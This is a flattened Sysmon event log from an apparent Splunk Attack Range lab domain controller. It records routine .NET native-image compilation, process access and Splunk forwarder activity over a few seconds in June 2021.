21:04:19.462{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.446{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.446{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-A903-00000000CF01}6716C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.400{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.384{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:19.384{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D3-60D3-A803-00000000CF01}6984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:19.353{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19b8-0\Microsoft.PowerShell.ScheduledJob.dll2021-06-23 21:04:19.353 354300x800000000000000020661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.220{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61424-false10.0.1.12-8000- 10341000x800000000000000020660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:18.995{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D2-60D3-A703-00000000CF01}6584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000020685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.509{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7BE54D8C2E5683825761A53313CCCF,SHA256=75FB7042DA5042EF060F392A719C079B377984AF481C55E7330DDCC815063514,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.118{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.103{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.103{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.056{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.040{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:20.040{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D4-60D3-AC03-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:20.009{4DB9351A-A1D3-60D3-AB03-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1af0-0\Microsoft.PowerShell.Security.Activities.dll2021-06-23 21:04:20.009 23542300x800000000000000020694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.525{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51398E40DC09966F733A2A686BEB107D,SHA256=8553B0A8A56DC0940C86487EF8036C4E5AE78B5939B9FB9CD9AF8857FD148F56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.212{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.212{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D5-60D3-AF03-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.150{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.134{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.134{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D5-60D3-AE03-00000000CF01}6980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:21.087{4DB9351A-A1D4-60D3-AD03-00000000CF01}6300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\189c-0\Microsoft.PowerShell.Utility.Activities.dll2021-06-23 21:04:21.087 23542300x800000000000000020686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:21.056{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=506D8C007B724F73E678E0DD848F0CEC,SHA256=D598B04F28150F93704916CA2A3130E36BA62F02112BE1EFD8B14A414A15CE1D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.634{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:22.618{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D6-60D3-B103-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 